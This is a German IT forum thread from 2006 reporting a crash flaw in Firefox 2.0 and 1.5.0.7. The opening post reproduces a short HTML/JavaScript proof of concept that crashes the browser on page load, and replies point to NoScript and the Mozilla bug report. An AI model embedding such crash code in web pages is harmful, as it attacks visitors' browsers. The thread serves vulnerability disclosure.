Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

FLAW in Firefox 2.0 und 1.5.0.7

Frage Sicherheit

Mitglied: gnarff

gnarff (Level 2) - Jetzt verbinden

02.11.2006, aktualisiert 26.03.2012, 4708 Aufrufe, 2 Kommentare

Eine Schwachstelle in den o.g. genannten Versionen des beliebten Firefoxbrowsers ermoeglicht Denial of Service und u.U. die Ausfuehrung von Remote Code.

Hallo liebe Gemeinde!

Einfach mal auf diesen Link klicken, Browser wird sofort abgeschossen.

PoC hier: http://werterxyz.altervista.org/Firefox2Range.htm
01.
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> 
02.
<html> 
03.
<head> 
04.
<script type="text/javascript"> 
05.
function do_crash() 
06.
07.
var range; 
08.
 
09.
range = document.createRange(); 
10.
range.selectNode(document.firstChild); 
11.
range.createContextualFragment('<span></span>'); 
12.
13.
</script> 
14.
</head> 
15.
<body onload="do_crash()"> 
16.
<p>Good bye Firefox!</p> 
17.
</body> 
18.
</html>
[31.10.2006, 03:14 am, von "xxxx"]

saludos
gnarff
Mitglied: 11078
02.11.2006 um 08:14 Uhr
Hallo,

nein, stürzt nicht ab. Javascript habe ich nämlich schon lange nicht mehr aktiviert und das kann man nur jedem raten. Beziehungsweise um es differenzierter abzuschalten:

http://www.erweiterungen.de/detail/NoScript/


Gruß,
Tim
Bitte warten ..
Mitglied: gnarff
02.11.2006 um 12:54 Uhr
hallo tim
Hallo,

nein, stürzt nicht ab. Javascript habe
ich nämlich schon lange nicht mehr
aktiviert und das kann man nur jedem raten.
ja, aber der bug im code bleibt trotzallem unbehoben:
https://bugzilla.mozilla.org/show_bug.cgi?id=358797

Beziehungsweise um es differenzierter
abzuschalten:

http://www.erweiterungen.de/detail/NoScript/

gute idee, diese erweiterung kannte ich noch nicht...

Gruß,
Tim

saludos
gnarff
Bitte warten ..
Ähnliche Inhalte
Verschlüsselung & Zertifikate
Root Zertifikat in Firefox importieren (3)

Frage von DarkScabs zum Thema Verschlüsselung & Zertifikate ...

Batch & Shell
Findstr Path CMD ja - Batch Script nein - FireFox Profiles (2)

Frage von ChrisIO zum Thema Batch & Shell ...

Webbrowser
gelöst Firefox ESR 52.2.0 - "einige druckfunktionen sind derzeit nicht verfügbar" (6)

Frage von BAMA1971 zum Thema Webbrowser ...

Neue Wissensbeiträge
Heiß diskutierte Inhalte
Firewall
Welche Firewall ? (18)

Frage von Cyberurmel zum Thema Firewall ...

Windows Server
WIndows Server 2016 core auf dem Intel NUC NUC5i5RYK i5 5250U (17)

Frage von IxxZett zum Thema Windows Server ...